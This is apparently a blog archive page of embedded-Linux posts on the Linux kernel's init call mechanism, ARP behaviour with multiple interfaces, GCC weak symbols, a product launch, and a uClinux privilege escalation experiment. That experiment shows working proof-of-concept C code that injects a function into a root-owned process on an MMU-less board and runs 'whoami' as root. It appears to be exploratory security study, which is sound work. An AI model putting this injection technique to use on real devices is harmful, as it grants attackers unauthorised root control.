Little Blue Linux

February 17th, 2009

I’d like to introduce something that I’m quite passionate about at the moment and it’s a new product I’m managing at work called ‘Little Blue Linux‘ - It’s a complete Linux distribution that provides everything a developer could possibly need to get started with embedded applications development and more importantaly everything is already set up and configured so you can start writing your first application or custom Embedded Linux Distribution (BSP) in less than 20 minutes from first boot - and that’s not an exaggeration.

Little Blue Linux Logo

Little Blue Linux Logo

More often than not when it comes to evaluating the use of Linux on an embdedded development board such as the Renesas RSK+ SH7203 or SH7670 you often want to test the ground and write a demo application or proof of concept. For a well-seasoned embdeded Linux developer this task is straight forward and if any problems come up on the way they are likely to be ironed out quickly due to their many years of experience…

…however for the rest of us this process can seem over complicated, challenging and always time consuming - if anything goes wrong, for example being presented with some hiddious error message, the temptation to give up becomes a hard one to resist. Besides why should we need to know or care about the inner working of the Linux kernel or tool-chain to write an application?

It’s probably quite useful to take a brief look at what’s involved in translating source code into an application which can run on an embedded devleopment board. The first step is to install a Linux operating system on a development machine - as you can imagine most of the tools required to build a Linux application are designed to run on Linux. After selecting a suitable OS and installing it the next step is to install the various software packages required to support development. Next we need to obtain and build the revelant tool-chains and board support packages for our development board. Only at this point can we consider building our application and then worry about deploying onto the development board. Without going into too much detail - each of these steps can prove challenging or time-consuming. For example, a typical way to deploy an application during development is to use a Network File System (NFS) - however setting this up requires installing NFS on your development machine and then spending quite a bit of time figuring out how to configure it.

Little Blue Linux is provided on a live USB stick (or CD-ROM) so there is no need to re-partition your hard drisk in order to make room. The other great thing about a live CD is that moments after boot everything is set up ready to go - so rather than spend hours figuring out which packages are required or how to set up NFS you can start writing code - and even this step is easier - In fact, the main feature of Little Blue Linux is an application aptly named Igloo that is based around the very popular and open-source application - Eclipse. Igloo provides a complete integrated development envrionment (IDE) that allows you to develop applications, embedded linux distributions and you can do all that without having to touch the command line or learn how to use Linux text editors. Deployment is automatic and debugging is just as easy.

Though it’s worth mentioning that Little Blue Linux can provide more than just a way to quickly write demo applications for a proof of concept. The BSP project wizard allows you to create an embedded linux distribution suitable for your development board by selecting components from a list of packages - for example to create a minimal BSP you can select the kernel, u-boot and busybox packages. You can easily import your application into your BSP design, customise the configurations of your chosen packages (e.g. the kernel, busybox) and finally tweak some of the files of the distribution for your purpose - perhaps to customise how the device boots. During this time you can easily test your customised BSP and when you are ready for production you can let Igloo generate a binary image suitable for flashing!

Little Blue Linux is very new and we’re still working hard to fine tune some of the features and fully test it - however it will be launched very shortly - just in time for the Embedded World Exhibition. For more information or to try out a free evaluation edition visit the product’s home page - If you’re new to embedded applications development it’s a fantastic way to get started - Let me know how you get on.

  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google
  • Slashdot
  • Reddit
  • Technorati

Init Call Mechanism in the Linux Kernel

November 17th, 2008

The Linux Kernel has for a long time (at least since v2.1.23) contained a clever and well optimised mechanism for calling initialisation code in drivers. It’s clever because its functionality is largely abstracted from the driver developer and well optimised because after initialisation, memory containing the initialisation code is released. This post explores how the mechanism works.

We’ll start by seeing how driver developers make use of this functionality; the following code has come from v2.6.27.6/drivers/net/smc911x.c and is the driver for a common Ethernet chipset.

2206: static int __init smc911xinit(void)
2207: {
2208: return platform_driver_register(&smc911x_driver);
2209: }
...
2216: module_init(smc911x_init);

The smc911xinit function can be considered as the entry point into the driver - of particular interest is the __init macro and the static declaration. The __init macro is used to describe the function as only being required during initialisation time. Once initialisation is performed the kernel will remove this function and release its memory. The module_init macro is used to tell the kernel where the initialisation entry point to the module lives, i.e. what function to call at ’start of day’. In a typical driver you will often see many initialisation functions marked with the __init macro which are used for initialisation, and a single module_init declaration.

Even though we are expecting the kernel to call smc911x_init at ’start of day’ we have marked it as static and that is OK (we will see later how the function is called). This is a particular strength of the init call mechanism as it reduces the amount of public symbols and reduces the coupling between driver modules and other parts of the kernel.

The optimisation provided by the init call mechanism also provides a means for recovering memory used by initisalation data. Such data can be ‘tagged’ with the __initdata macro.

With the above code in place, at an appropriate time during start-up, the kernel will call the smc911xinit function and once it has been executed it’s memory will be released. You can see this during the output from kernel boot (e.g. dmesg), for example an x86 machine may print the following:

Freeing unused kernel memory: 386k freed

Which means that 386k of memory that previously contained initialisation code and data has now been freed.

OK - So we’ve seen how the mechanism is used, let’s now take a closer look and see how it works under the hood. A quick ‘grep’ reveals that the __init macro is defined in include/linux/init.h:

43: #define __init      __section(.init.text) __cold

And the __section and __cold macros are defined in the include/linux/compiler*.h files:

compiler.h: 182: #define __section(S)  __attribue__ ((__section__(#S)))
compiler-gcc4.h: #define __cold        __attribue__ ((cold))

And when we expand it out we get:

#define __init __attribute__((__section__(".init.text"))) __attribute__ ((cold))

Thus, when the __init macro is used a number of GCC attributes are added to the function declaration - in the case of a different compiler, the compiler.h file will ensure the macros expand out to whatever is necessary for the relevant compiler. The cold attribute is a relatively new GCC attribute and has existed since GCC4.3 - its purpose is to mark the function as one that is rarely used, this results in the compiler optimising the function for size instead of speed. What we are really interested here is the ’section’ attribute. This __init macro uses this attribute to inform the compiler to put the text for this function is a special section named “.init.text”. The purpose here is to put all initialisation functions in a single ELF section such that a block of them can be removed after initialisation has been performed.

So what does module_init do? Its exact functionality depends if the module in question is built-in or compiled as a loadable module. For the purpose of this post, we’ll just be looking at the built-in modules. Back to include/linux/init.h:

259: #define module_init(x) __initcall(x);
204: #define __initcall(fn) device_initcall(fn)
199: #define device_initcall __define_initcall("6", fn, 6)
169: #define __define_initcall(level, fn, id) \
170:            static initcall_t __initcall_##fn##id __used \
171:            __attribute__ ((__section__(".initcall" level ".init"))) = fn

So another load of macros that result in yet another GCC attribute!

#define module_init(x) static initcall_t __initcall_x6 __used \
                       __attribute__ ((__section(".initcall6.init"))) = x;

And for clarity, let’s exapnd our the module_init macro as seen in our ethernet driver:

static initcall_t __initcall_smc911x_init6 __used \
                  __attribute__ ((__section(".initcall6.init"))) = smc911x_init;

So module_init in the context of a built-in driver results in declaring a function pointer with a unique name to our point of entry. In addition the macro ensures the function pointer is located in a special section of the ELF - we’ll see why shortly.

So at present we have ensured all our initialisation code and data are stored in the .init.text section, and that each module has a function pointer for it’s point of entry - which has a unique name and is also stored in a special section of the resulting ELF. In addition during link time the include/asm-generic/vmlinux.lds.h and arch/*/kernel/vmlinux.lds.S scripts ensure that some labels/symbols surround the start and end of these sections. I.e. __early_initcall_end and __initcall_end mark the start and end of the function pointers and __init_begin and __init_end mark the start and end of the .init.text section.

Finally we are in place to see how these functions get called and how they are eventually freed. During kernel start up a function called do_initcalls in init/main.c is called, this is shown below.

749: static void __init do_initcalls(void)
750: {
751:      initcall_t *call;
752:
753:      for (call = __early_initcall_end; call < __initcall_end; call++)
754:           do_one_initcall(*call);
755:

The purpose of this loop is to execute each of the init functions as set up by the module_init macros. This is achieved with a simple for loop and a function pointer. Initially the function pointer is pointed to the label at the start of our function pointers ELF section, and is incremented (by the size of a function pointer (sizeof(initcall_t *)) until the end of the ELF section is reached. For each step the pointer is invoked and the init function is thus executed.

Once initialisation is complete, a function found in the architecture specific code named free_initmem is used to release the memory pages taken up by the initialisation functions and data. The exact nature of the function depends on the architecture.

So in a nutshell the kernel makes clever use of GCC attributes to ensure that initialisation functions and pointers to them are stored in unique sections of the ELF. Initialisation code at kernel start up then iterates through these function pointers and executes them in turn. Finally once all init code has been executed the entire ELF section (.init.text) is freed for use!

  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google
  • Slashdot
  • Reddit
  • Technorati

Multiple Network Interface Gotcha in Linux

November 9th, 2008

Ok here’s a recipe to try:

  • Get a development board or PC that has two or more network interfaces,
  • Assign each of them with a unique IP address,
  • Connect the interfaces to a common network,
  • Finally, ping one of the IP addresses from another machine.

Now, depending on which IP address you chose to ping, you may find that your pings will suddenly fail to respond and timeout when you disconnect the other interface (i.e. the interface you are not pinging). Bizarre, isn’t it?

However, as my colleague and I recently discovered whilst debugging a new Ethernet driver, this gotcha is actually correct behaviour for Linux - and in fact it is correct behaviour as defined by the relevant RFC’s. I thought I’d use this post to discover what is going on and why this is OK.

In order to reproduce this behaviour I set up a virtual machine and assigned it with a number of NAT’d Ethernet devices (4 in fact). I also set up Wireshark (what used to be Ethereal) so that I could monitor any traffic. Here is cut down version of the output from ifconfig.

$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:12:0b:bd
          inet addr:192.168.27.132  Bcast:192.168.27.255  Mask:255.255.255.0

eth1      Link encap:Ethernet  HWaddr 00:0c:29:12:0b:c7
          inet addr:192.168.27.133  Bcast:192.168.27.255  Mask:255.255.255.0

eth2      Link encap:Ethernet  HWaddr 00:0c:29:12:0b:d1
          inet addr:192.168.27.135  Bcast:192.168.27.255  Mask:255.255.255.0

eth3      Link encap:Ethernet  HWaddr 00:0c:29:12:0b:db
          inet addr:192.168.27.134  Bcast:192.168.27.255  Mask:255.255.255.

I cleared the ARP cache on my Windows machine by using “arp -d” and then pinged 192.168.27.132. The packet exchange captured by Wireshark proved to be quite interesting. Let’s take a look.

No.  Source                Destination        Protocol   Info
1  Vmware_c0:00:08       Broadcast             ARP      Who has 192.168.27.132?  Tell 192.168.27.1
2  Vmware_12:0b:db       Vmware_c0:00:08       ARP      192.168.27.132 is at 00:0c:29:12:0b:db
3  192.168.27.1          192.168.27.132        ICMP     Echo (ping) request
4  Vmware_12:0b:d1       Vmware_c0:00:08       ARP      192.168.27.132 is at 00:0c:29:12:0b:d1
5  Vmware_12:0b:c7       Vmware_c0:00:08       ARP      192.168.27.132 is at 00:0c:29:12:0b:c7
6  Vmware_12:0b:bd       Vmware_c0:00:08       ARP      192.168.27.132 is at 00:0c:29:12:0b:bd
7  192.168.27.132        192.168.27.1          ICMP     Echo (ping) reply
8  192.168.27.1          192.168.27.132        ICMP     Echo (ping) request
9  192.168.27.132        192.168.27.1          ICMP     Echo (ping) reply
10 192.168.27.1          192.168.27.132        ICMP     Echo (ping) request
11 192.168.27.132        192.168.27.1          ICMP     Echo (ping) reply

After I invoke the ping command, my machine issues an ARP broadcast, asking for the MAC address currently associated with 192.168.27.132. However all of the network interfaces of my virtual machine respond - resulting in 4 ARP replies. When this happens Windows (and other OS’s) will ignore all but the first response, with the assumption that the first reply must have come from the quickest route.

In this example the quickest ARP reply came from the MAC address associated with eth3. Therefore whenever we communicate with 192.168.27.132, as we have done via Ping, the traffic will be sent to eth3. As a result, if we now down interface eth3 with “ifconfig eth3 down”, our pings will fail. This behaviour can be confusing as why should eth3 going down affect traffic that is directed to 192.168.27.132 which we believed to be associated with eth1?

Despite the impression ifconfig gives, Linux associates IP addresses with the host as opposed to individual interfaces of the host. With that in mind, the behaviour we’ve seen doesn’t seem so bizarre. When a network interface receives an ARP request for an IP address which it owns, then in effect a valid network route been made between the requestor and the requested. This route could potentially be the only route and as it is likely that the two will communicate with each other, it makes sense to reply to the ARP request. And this is what happens - the network interface that received the ARP request will now act as a proxy for the requested IP address.

This behaviour is actually quite convenient. In our example, even though our pings began to fail once we disconnected a route to the host - as soon as the Windows ARP cache times out (after 10 minutes) another ARP request will be broadcast. Like before, any interface that can provide a route to the host will respond, and so connectivity will be restored. If Linux wasn’t designed in this way and each interface truly owned an IP address, then if that link went down connectivity would never be restored to that address - even though there are other physical connections to the machine that has that IP address!

The other point of interest here, at least with this contrived networking configuration, is that reliability is favoured over performance. The reason is that where multiple interfaces exist on a machine, it’s quite likely that a priority ordering will exist between them. And so if, as in this case, eth3 replies the quickest then it is likely that it will always be the quickest. As a result, it is also likely to respond to all the ARP requests first and so all traffic for the 4 IP addresses will arrive on a single interface. We can demonstrate this. After pinging all of the IP addresses assigned to my virtual machine we can examine the ARP cache of Windows.

arp -a

Interface: 192.168.27.1 --- 0x2
  Internet Address      Physical Address      Type
  192.168.27.132        00-0c-29-12-0b-bd     dynamic
  192.168.27.133        00-0c-29-12-0b-bd     dynamic
  192.168.27.134        00-0c-29-12-0b-bd     dynamic
  192.168.27.135        00-0c-29-12-0b-bd     dynamic

As you can see all the IP addresses correspond to the same interface, i.e. eth3. Thus all the traffic will go over a single 10/100Mbit link instead of 4 links.

Fortunately, where this behaviour isn’t ideal, the proc interface provides a means to modify it. Of particular interest are the arp_filter and rp_filter sysctl knobs which can be found in the proc interface. I’ve not really managed to make complete sense of these yet and may well write another post on these in the future. Though for the behaviour described above it was necessary for me to invoke “echo 0 > /proc/sys/net/ipv4/conf/all/rp_filter”, I found without this I would only ever get two ARP replies instead of 4 - I’m not entirely sure why this is… suggestions anyone?

And finally, for those that wish to read more, I recommend an article on LWM which provides some more background information.

  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google
  • Slashdot
  • Reddit
  • Technorati

Privilege Escalation in uClinux

November 4th, 2008

The main difference between Linux and uClinux is that the latter is designed to work with systems without an MMU (Memory Management Unit). The main benefit of an MMU is that systems that utilise them can provide each process with it’s own virtual address space - by doing so each process is prevented from causing disruption to others.

uClinux systems do not have an MMU, all processes share a common address space and so there is often - but not always (see comments at the end of this post), no protection from processes interfering with each other. The security implications of this are widely known and understood - the applications of uClinux systems are usually such that this isn’t of great concern. However I wanted to see this for myself - I wanted to put the theory in practice and see how easy it is to disrupt another process and to see if privilege escalation can be achieved.

For my investigations I installed MPC Data’s board support package (BSP) on a Reneas RSK+ 7203 development board. The board is based on a nippy SuperH 200Mhz 2A core and provides a host of features including serial, Ethernet, LCD, USB, etc. To speed up the development cycle I also set up an NFS mounted filesystem.

To start, I wanted to see if writing into another process is really that straightforward, my final output is two executables as follows.

process1.c
01: #include <stdio.h>
02:
03: volatile int value = 20;
04:
05: int main()
06: {
07:    printf("%s:Process 1 started with Value %d, &Value = %p\n",
         __FILE__, value, &value);
08:    while (value == 20)
09:      ;
10:
11:    printf("%s:Value is now %d\n", __FILE__, value);
12:    return 0;
13: }

process2.c
01: #include <stdio.h>
02:
03: int main()
04: {
05:    int *value;
06:    value = (int *)0xcf04084;
07:
08:    printf("%s:Value has been set from %d to %d\n", __FILE__, *value, 10);
09:    *value = 10;
10:
11:    return 0;
12: }

The first process displays the value and address of a global variable and waits for it to change - if it does it displays its new value. The variable is a global to reduce the likelihood of it’s address changing too much between runs and is volatile to prevent any optimisation from turning the while loop into a while(1).

The second process is designed to modify the variable in the first process - this code is straightforward, it creates a pointer, points it to our known address (as outputted from the previous process) and modifies the value.

Let’s see what happens when we build and run…

$ sh-linux-gcc -m2e -mb process1.c -elf2flt=s65546 -o process1
$ sh-linux-gcc -m2e -mb process2.c -elf2flt=s65546 -o process2

> ./process1 &
process1.c:Process 1 started with Value 20, &Value = 0xcf04084

> ./process2
process2.c:Value has been set from 20 to 10
process1.c:Value is now 10

Fantastic! Using one process we were able to modify another process’s address space. However, we still haven’t managed to escalate our privileges - my next step is to try and get another process with higher privileges to execute our functions, in theory this can be done with a simple memcpy. This took me a bit longer to get right as I originally intended on searching the address space for known code, perhaps the call site of a printf or a destructor and modify it such that it calls our function instead - however this proved a little more tricky and is something I will come back to.

Take a look at this code:

process3.c
01: #include <stdio.h>
02:
03: void function()
04: {
05:    sleep(10);
06: }
07:
08: int main()
09: {
10:    printf("Function - %p\n", function);
11:    while (1)
12:    {
13:      function();
14:    }
15: }

process4.c
01: #include <stdio.h>
02: #include <unistd.h>
03:
04: void inject()
05: {
06:    system("whoami");
07: }
08:
09: int main()
10: {
11:    memcpy((void *)0xc880dc, inject, (void*)main-(void*)inject);
12: }

The code describes two processes - The first represents a process that may be running with privileges that we wish to obtain and the second represents a process that will be used to perform our privilege escalation exploit to obtain the privileges of the first. Just like the previous examples process 3 prints the memory address of the function it regularly calls. Likewise the second process uses memcpy to copy it’s inject function into the address space of the first process. The idea is that when function is called, our inject code will be executed instead. The inject code simply invokes the whoami executable to print the user running the code.

Let’s give it a go…

$ sh-linux-gcc -m2e -mb process3.c -elf2flt=s65546 -o process3
$ sh-linux-gcc -m2e -mb process4.c -elf2flt=s65546 -o process4

root> ./process3 &
60
Function - 0xc8200dc
root> su andy
andy> ./process4
root

It works! As the output shows we start of by running in background our process 3 with root privileges - the process ID is displayed and so is our function address. We then run our process 4 under the ‘Andy’ user - shortly after executing, the function is called but instead of sleeping our inject call is invoked and whoami successfully prints out ‘root’ instead of ‘andy’. So effectively we have been able to invoke a process with privileges that we are not entitled with, i.e. when logged in as Andy we have executed whoami as root!

However, this is hardly a polished and practical exploit, as we are relying on another process to co-operate and print the key addresses of its source. Additional work would be needed to find the location of suitable and interesting parts. There are a numerous ways of doing this but are beyond the scope of today’s post.

It took me quite a few attempts for this to work as it does and still it is not 100% reliable - simply memcpy’ing functions and expecting them to work hides the complexaties of the underlying machine code. Even though our system call was executed correctly adding printf’s before or after don’t always work - it’s a much more complicated picture. Nevertheless we achieved our goal and performed privilege escalation under uClinux (If not with a little help from the exploited executable).

The next steps and perhaps a future post would be to study this further under GDB and see how this can be used in practice on a typical embedded system.

  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google
  • Slashdot
  • Reddit
  • Technorati

Digging Deeper into Weak Symbols

October 29th, 2008

Following on from my last post, I thought I’d dig a bit deeper into GCC’s weak symbols and use the NM utility from GNU’s Binutils package to help understand a bit better how it works.

I probably don’t use the Binutils package as often as I should when debugging and thought this post would be a perfect opportunity to do so - for those that are unfamiliar with it, it’s a package that usually comes with your compiler and provides the ability to explore and manipulate the object code of various binaries. It consists of things like readelf, objdump, nm, etc - sound familiar?

To get started I created some simple source:

weak.c
01: #include <stdio.h>
02:
03: void __attribute__((weak)) test()
04: {
05:   printf("%s:%d - Original test()\n", __FILE__, __LINE__);
06: }
07:
08: int main()
09: {
10:   test();
11: }

weak2.c
01: #include <stdio.h>
02:
03: void test()
04: {
05:   printf("%s:%d - Overridden test()\n", __FILE__, __LINE__);
06: }

And then i built it and executed it as follows:

$ gcc -c weak.c weak2.c
$ gcc weak.o weak2.o -o weak
$ ./weak
weak.c:5 - Overridden test()
$

So as expected the original weak test function was overridden by the test function in weak2.c - so far so good! We compiled both C files as separate relocatable units so that we could examine each object file before linking - let’s do that.

By using “nm” we can examine the symbols from both o files, we do this with the following command:

$ nm weak*.o

weak2.o:
         U printf
00000000 T test

weak.o:
00000024 T main
         U printf
00000000 W test
$

The output shows the value, type and name of symbol found in the objects - The printf is shown as (U)ndefined, as printf is found in libc and we haven’t yet linked against it this is expected, this is also why it doesn’t have an address. The main function is shown as (T)ext, meaning it is found in the code section of the object - the address 0×24 is it’s offset from the start of the file. Finally we have out test function symbols - they are found at address 0×00 (possibly because they were found at the start of their source files), however their symbol types are labelled differently. Our weak test function is labeled (W)eak and our non-weak function is labeled as (T)ext.

With regards to weak symbols It’s easy to imagine what the linker does - whenever the linker discovers a new symbol that matches the name of one already discovered if they both are of type T then bail out with a multiple definition error, if one is T and one is W then discard the W symbol and replace with the T symbol. Though what happens when both are (W)eak?

After some experimentation it seems that when declaring multiple symbols of the same name (which seems to be allowed), the symbol used is the one fist encountered! (This can be demonstrated by using the existing code but making both test functions weak - the program outputs different results depending on if gcc weak.o weak2.o -o weak is used or gcc weak2.o weak.o -o weak!). Seems nasty to me.

Finally we can see the resultant output with our linked binary:

$ nm weak
...
080483bc T main
         U printf@@GLIBC_2.0
08048374 T test
...

The first thing you’ll notice is there are a lot more symbols, this is because we’re now looking at an executable rather than a relocatable object file. The difference is the linker will have linked together the multiple object files and added various symbols to support the Linux loader and additional code both before and after the main (but more on this in another post). The second thing to notice is that the addresses are suddenly much higher - this is because the symbols are now using virtual memory addresses.

Finally you’ll notice that printf is still (U)defined, though there is now a @@GLIBC_2.0 appended to the end of it - this is because we’re using shared libraries, try building with the “-static” flag and look at the difference.

The nm utility is just one of many utilities in the binutils package - when fully understood these utilities can provide a great insight and a useful debugging tool. I find it easy to take for granted the workings that go on under the hood and the more time I spend exploring the more questions I raise. I have no doubt that my attempts to answer some of these questions will result in many more posts.

  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google
  • Slashdot
  • Reddit
  • Technorati

GCC Weak Symbols

October 18th, 2008

GNU’s GCC has a useful (and perhaps not very well known) feature known as ‘weak symbols’. I first discovered this a while back when building a Linux kernel - however unbeknown to me the Linux kernel makes great use of weak symbols yet the compiler I used did not correctly support them. Rather than a failed build the kernel built fine and even run - I was instead presented with a number of interesting bugs, but more on this later.

In a nutshell weak symbols permit you to define a symbol that doesn’t need to be resolved at link time, i.e. it allows you to tell the compiler that this function may not have a body and that is OK. Furthermore, if later the compiler comes across another symbol with the same name that doesn’t have the weak attribute the original symbol will be overwritten with the stronger symbol (Without getting a multiple defination linker error). And finally you can also use the symbol to determine, at run-time, if such a body exists.

To give you an example of its use let’s refer back to my original bug…

v2.6.27/arch/sh/kernel/cpu/clock.c
292: void __init __attribute__ ((weak))
293: arch_init_clk_ops(struct clk_ops **ops, int type)
294: {
295: }

This function is part of the architecture specific (SH) code for setting up the various clocks of the device. The function defined above is used to return a structure of clock operations (struct clk_ops) which is later used to register the clock within the kernel. As you can see the function is declared with a weak symbol via the “weak” attribute. Therefore, when built correctly, the function can be overridden.

The design of this part of the kernel is such that generic clock operations are defined in clock.c and can be later overridden via weak symbols by implementations for specific CPU subtypes - for example this function is overriden in the clock-sh7712.c file…

v2.6.27/arch/sh/kernel/cpu/clock-sh7712.c
66: void __init arch_init_clk_ops(struct clk_ops **ops, int idx)
67: {
...

The function hasn’t been defined as a weak symbol and so will override the weak symbol. In this case the function will provide the caller with the clock operations specific to the SH7712. In this manner the existing generic clock support code has been designed such that it can be easily extended to support future SH subtypes. Likewise weak symbols are used elsewhere in the kernel (since 2.4.0) for similar effect.

Whilst my version of GCC claimed to support weak symbols there was a known GCC bug that prevented this from working correctly. I found that the code would only work correctly if the weak arch_init_clk_ops function had code in it’s body - what was happening was that the compiler was optimising out the function all together (with the -O2 optimisation GCC flag) and resulted in the non-weak symbol not being called (There is a quick hack to fix this which is to use the -fno-unit-at-a-time flag, however this is expected to be removed from GCC in the future.)

It’s always worth looking at the “/Documentation/Changes” file included with the kernel, it contains a list of the tools required and the minimal version of each tool. Just because the kernel builds doesn’t mean that it has built in the way intended by the Linux contributors!

References:

GCC Function Attributes (gnu.org)
GCC Help Mailing List Archive - Discussing weak symbols and optimisation (gnu.org)
Further Discussion of this bug in KGDB - Here (osdir.com) and Here (lkml.org)
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google
  • Slashdot
  • Reddit
  • Technorati